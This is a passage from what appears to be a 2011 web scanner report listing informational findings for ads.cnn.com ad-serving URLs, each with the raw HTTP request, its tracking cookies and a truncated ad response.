Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:39 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:39 GMT
Pragma: no-cache
Content-Length: 4283
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.13. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=social_sync&cnn_money_position=475x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting¶ms.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=480339  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=social_sync&cnn_money_position=475x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=480339

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=social_sync&cnn_money_position=475x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=480339 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:35 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:35 GMT
Pragma: no-cache
Content-Length: 3422
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.14. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo¶ms.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=698354  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=698354

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=698354 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:33 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:33 GMT
Pragma: no-cache
Content-Length: 2765
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.15. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=technology&cnn_money_section=quigo¶ms.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=766274  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=766274

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=766274 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:35 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:35 GMT
Pragma: no-cache
Content-Length: 2722
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.16. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=markets_and_stocks&cnn_money_section=market_news¶ms.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014106&page.allowcompete=yes&domId=644255  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=markets_and_stocks&cnn_money_section=market_news&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014106&page.allowcompete=yes&domId=644255

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=markets_and_stocks&cnn_money_section=market_news&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014106&page.allowcompete=yes&domId=644255 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:39 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:39 GMT
Pragma: no-cache
Content-Length: 3922
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.17. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=technology¶ms.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990030&page.allowcompete=yes&domId=919796  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=technology&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990030&page.allowcompete=yes&domId=919796

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=technology&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990030&page.allowcompete=yes&domId=919796 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:35 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:35 GMT
Pragma: no-cache
Content-Length: 3717
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.18. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=technology¶ms.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990030&page.allowcompete=yes&domId=696470  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=technology&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990030&page.allowcompete=yes&domId=696470

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=technology&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990030&page.allowcompete=yes&domId=696470 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:35 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:35 GMT
Pragma: no-cache
Content-Length: 3634
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.19. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x23_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x23_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105?callback=jsonp1313434029233&_=1313434043146 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0; s_cc=true; s_sq=%5B%5BB%5D%5D; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:47:15 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:47:15 GMT
Pragma: no-cache
Content-Length: 115
Content-Type: text/html

callback({ "ad": { "advertiser_text": "Trade Now", "click_url": "", "tracking": "", "third_party_tracking": "" } })

18.20. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x23_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x23_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105?callback=jsonp1313434029234&_=1313434043146 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0; s_cc=true; s_sq=%5B%5BB%5D%5D; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:47:17 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:47:17 GMT
Pragma: no-cache
Content-Length: 1431
Content-Type: text/html

callback({ "ad": { "advertiser_text": "E*TRADE","click_url": "http://ad.doubleclick.net/click;h=v2|3D51|0|0|%2a|j;234140391;0-0;0;58074575;31-1|1;39756396|39774183|1;;;pc=[TPAS_ID]%3fhttps://us.etrade
...[SNIP]...

18.21. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x23_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x23_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105?callback=jsonp1313434029235&_=1313434043146 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0; s_cc=true; s_sq=%5B%5BB%5D%5D; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:47:17 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:47:17 GMT
Pragma: no-cache
Content-Length: 1688
Content-Type: text/html

callback({ "ad": { "advertiser_text": "TD Ameritrade","click_url": "http://ads.cnn.com/event.ng/Type%3dclick%26FlightID%3d384614%26AdID%3d526236%26TargetID%3d108094%26Segments%3d1869,1880,2244,2743,32
...[SNIP]...

18.22. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x23_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x23_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105?callback=jsonp1313434029236&_=1313434043147 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0; s_cc=true; s_sq=%5B%5BB%5D%5D; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:47:17 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:47:17 GMT
Pragma: no-cache
Content-Length: 1665
Content-Type: text/html

callback({ "ad": { "advertiser_text": "Scottrade","click_url": "http://ads.cnn.com/event.ng/Type%3dclick%26FlightID%3d351447%26AdID%3d483240%26TargetID%3d108070%26Segments%3d1869,1880,2244,2743,3285,6
...[SNIP]...

18.23. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon5&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x23_spon5&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x23_spon5&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105?callback=jsonp1313434029237&_=1313434043147 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0; s_cc=true; s_sq=%5B%5BB%5D%5D; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:47:10 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
